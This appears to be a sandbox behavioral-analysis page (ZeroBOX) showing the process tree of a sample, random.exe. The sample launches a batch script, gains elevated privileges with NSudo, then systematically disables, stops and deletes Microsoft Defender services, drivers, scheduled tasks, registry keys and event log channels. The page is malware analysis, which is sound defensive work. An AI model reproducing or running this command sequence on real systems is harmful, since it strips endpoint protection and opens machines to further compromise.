| ZeroBOX

random.exe "C:\Users\test22\AppData\Local\Temp\random.exe"
2560
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\34.bat" "
  2656
  - cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
    2724
    - chcp.com chcp 65001
      2816
    - reg.exe reg query "HKU\S-1-5-19"
      2884
    - reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
      2928
    - NSudoLG.exe NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\test22\AppData\Local\Temp\34.bat
      2984
      - cmd.exe cmd /c C:\Users\test22\AppData\Local\Temp\34.bat
        3068
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
        2104
        
        chcp.com chcp 65001
        2204
        
        reg.exe reg query "HKU\S-1-5-19"
        2244
        
        reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        2424
        
        mode.com Mode 79,49
        2524
        
        cmd.exe C:\Windows\system32\cmd.exe /c ver
        2576
        
        reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
        2688
        
        find.exe find /i "0x0"
        2564
        
        cmd.exe C:\Windows\system32\cmd.exe /c tasklist
        2704
        
        tasklist.exe tasklist
        2872
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
        2868
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
        604
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
        2988
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"
        1356
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
        1384
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
        2472
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
        2544
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
        2612
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
        2800
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
        2924
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
        2372
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
        2080
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
        148
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
        2320
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
        2532
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
        2608
        
        reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter
        2904
        
        reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
        2392
        
        find.exe find /i "Windows 7"
        192
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "
        2240
        
        findstr.exe findstr /c:"6.1.7601"
        2672
        
        sc.exe sc config "WinDefend" start= disabled
        2956
        
        sc.exe sc stop "WinDefend"
        2784
        
        sc.exe sc delete "WinDefend"
        2380
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        2520
        
        sc.exe sc config "MDCoreSvc" start= disabled
        884
        
        sc.exe sc stop "MDCoreSvc"
        560
        
        sc.exe sc delete "MDCoreSvc"
        2208
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        504
        
        sc.exe sc config "WdNisSvc" start= disabled
        2720
        
        sc.exe sc stop "WdNisSvc"
        1120
        
        sc.exe sc delete "WdNisSvc"
        2776
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        1796
        
        sc.exe sc config "Sense" start= disabled
        2652
        
        sc.exe sc stop "Sense"
        2064
        
        sc.exe sc delete "Sense"
        2052
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        1864
        
        sc.exe sc config "wscsvc" start= disabled
        232
        
        sc.exe sc stop "wscsvc"
        1892
        
        sc.exe sc delete "wscsvc"
        1852
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        1560
        
        sc.exe sc config "SgrmBroker" start= disabled
        3108
        
        sc.exe sc stop "SgrmBroker"
        3156
        
        sc.exe sc delete "SgrmBroker"
        3204
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        3252
        
        sc.exe sc config "SecurityHealthService" start= disabled
        3300
        
        sc.exe sc stop "SecurityHealthService"
        3348
        
        sc.exe sc delete "SecurityHealthService"
        3396
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        3444
        
        sc.exe sc config "webthreatdefsvc" start= disabled
        3488
        
        sc.exe sc stop "webthreatdefsvc"
        3536
        
        sc.exe sc delete "webthreatdefsvc"
        3584
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        3632
        
        sc.exe sc config "webthreatdefusersvc" start= disabled
        3676
        
        sc.exe sc stop "webthreatdefusersvc"
        3732
        
        sc.exe sc delete "webthreatdefusersvc"
        3780
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        3852
        
        sc.exe sc config "WdNisDrv" start= disabled
        3896
        
        sc.exe sc stop "WdNisDrv"
        3944
        
        sc.exe sc delete "WdNisDrv"
        3992
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        4040
        
        sc.exe sc config "WdBoot" start= disabled
        4084
        
        sc.exe sc stop "WdBoot"
        3128
        
        sc.exe sc delete "WdBoot"
        3188
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        1108
        
        sc.exe sc config "WdFilter" start= disabled
        3316
        
        sc.exe sc stop "WdFilter"
        3376
        
        sc.exe sc delete "WdFilter"
        3460
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        3532
        
        sc.exe sc config "SgrmAgent" start= disabled
        3600
        
        sc.exe sc stop "SgrmAgent"
        3660
        
        sc.exe sc delete "SgrmAgent"
        1632
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        3680
        
        sc.exe sc config "MsSecWfp" start= disabled
        3796
        
        sc.exe sc stop "MsSecWfp"
        3848
        
        sc.exe sc delete "MsSecWfp"
        3924
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        4012
        
        sc.exe sc config "MsSecFlt" start= disabled
        4072
        
        sc.exe sc stop "MsSecFlt"
        2932
        
        sc.exe sc delete "MsSecFlt"
        3216
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        3340
        
        sc.exe sc config "MsSecCore" start= disabled
        3428
        
        sc.exe sc stop "MsSecCore"
        3552
        
        sc.exe sc delete "MsSecCore"
        3664
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        3692
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        3812
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        3964
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        4060
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        3184
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
        3248
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f
        3504
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f
        3648
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
        3704
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f
        3844
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
        4036
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f
        4008
        
        reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        3352
        
        reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        3564
        
        reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        1316
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        3784
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        3236
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        3360
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f
        3880
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f
        3436
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f
        3588
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f
        3424
        
        reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
        3628
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
        1320
        
        sc.exe sc start VMTools
        4124
        
        sc.exe sc start VMTools
        4172

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents